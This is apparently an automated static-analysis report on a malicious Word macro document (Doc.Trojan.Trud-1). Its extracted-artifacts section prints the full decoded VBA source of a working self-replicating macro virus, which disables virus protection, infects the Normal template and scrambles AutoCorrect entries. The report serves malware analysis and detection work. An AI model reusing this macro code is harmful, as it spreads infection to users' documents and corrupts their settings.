Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 998b9f83786405b9…

MALICIOUS

Office (OLE)

Size: 37.5 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 4e8b922697fbd74c18e39ee8e51649ed
SHA-1: f205319d5a8fda183d617e66ee1d7dd2e4356fd4
SHA-256: 998b9f83786405b9401edcdc3b22fdfda6e117aa8125624c2a3b497ea78810f2
Risk score: 240

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample contains a Document_Open VBA macro that attempts to establish persistence. It copies its code into the Normal template and modifies it there, most likely to ensure execution whenever new documents are created or opened. The macro also manipulates AutoCorrect entries, which obscures its activity from the user. The ClamAV detection 'Doc.Trojan.Trud-1' further supports its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Trojan.Trud-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Trud-1
  • Embedded Office document has suspicious static findings (critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE)
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY)
    The OLE file is 20,284 bytes but its declared streams total only 0 bytes, so 20,284 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • CFB header with no readable streams (medium, OLE_PARSE_EMPTY_STREAMS)
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous: it is seen with truncated or corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10440 bytes
SHA-256: dfbd057538c9fdaed18818feafe5f9165a9ea419004578c745022566d6c4e43a

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error GoTo hometime
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
hohoho = 0
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt > 0 And ad > 0 Then GoTo hometime
If Dir("c:\winini.log", vbSystem) = "" And nt = 0 Then
    Set host = NormalTemplate.VBProject.VBComponents.Item(1)
    ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
    ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\winini.log"
    SetAttr "c:\winini.log", vbSystem
    host.codemodule.AddFromFile ("c:\winini.log")
    host.codemodule.replaceline 5, "Private Sub Document_Close()"
    host.codemodule.replaceline 75, "Sub ViewVBCode()"
    host.codemodule.replaceline 78, "Sub ToolsMacro()"
Else
    plop = ActiveDocument.Saved
    plop2 = True
    Set host = ActiveDocument.VBProject.VBComponents.Item(1)
    host.codemodule.AddFromFile ("c:\winini.log")
End If
For x = 1 To 4
    host.codemodule.deletelines 1
Next x
hohoho = hohoho + 1
NormalTemplate.VBProject.VBComponents.Item(1).codemodule.replaceline 6, "hohoho = " & hohoho
If hohoho = 69 Then
    AutoCorrect.ReplaceText = True
    For z = 1 To AutoCorrect.Entries.Count
        txt1 = AutoCorrect.Entries.Item(z).Name
        txt2 = AutoCorrect.Entries.Item(z).Value
        AutoCorrect.Entries.Item(z).Value = "xyz"
        AutoCorrect.Entries.Item(z).Name = txt2
        AutoCorrect.Entries.Item(z).Value = txt1
    Next z
End If
If hohoho >= 69 Then
    Application.Caption = "Microsoft Turd"
    For x = 0 To 250 Step 50
    For y = 0 To 250 Step 50
        ActiveDocument.Shapes.AddShape(msoShapeSmileyFace, x, y, 50, 50).Fill.ForeColor.RGB = RGB(x, y, 250 - x)
    Next y
    Next x
    Set bln = Assistant.NewBalloon
    With bln
        .Heading = "Isn't life just a bitch"
        .Text = "Choose an option."
        .Labels(1).Text = "Loose all your data."
        .Labels(2).Text = "Loose most of your data."
        .Labels(3).Text = "Loose just enough data to really fuck you off"
        .BalloonType = msoBalloonTypeButtons
        .Mode = msoModeModal
        .Show
    End With
    With ActiveDocument.Content
        .InsertParagraphBefore
        .InsertBefore "Don't Worry About a Thing !!!    I wouldn't fuck up your data !!!"
    End With
    With ActiveDocument.Paragraphs(1).Range.Font
        .ColorIndex = wdGreen
        .Size = 24
    End With
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If plop2 Then ActiveDocument.Saved = plop
hometime:
End Sub
Private Sub Junk1()
    MsgBox ("Essential DLL missing.  Please reinstall Microsoft Office.")
End Sub
Private Sub junk2()
    MsgBox ("Essential DLL missing.  Please reinstall Microsoft Office.")
End Sub

' Processing file: /opt/analyzer/scan_staging/3a7eb66630904ddf9a6a57efe251d33e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5299 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError hometime 
' Line #2:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #5:
' 	LitDI2 0x0000 
' 	St hohoho 
' Line #6:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	St ad 
' Line #7:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	St
... (truncated)
Filename: embedded_office_off000046c4.ole
Kind: embedded-office
Source: Embedded OLE/CFB Office body inside OLE container at offset 0x46C4
Size: 20284 bytes
SHA-256: e647edde0a1e336626530fe7f4d20980d0aa65c162394e0a4f4164a48ee97509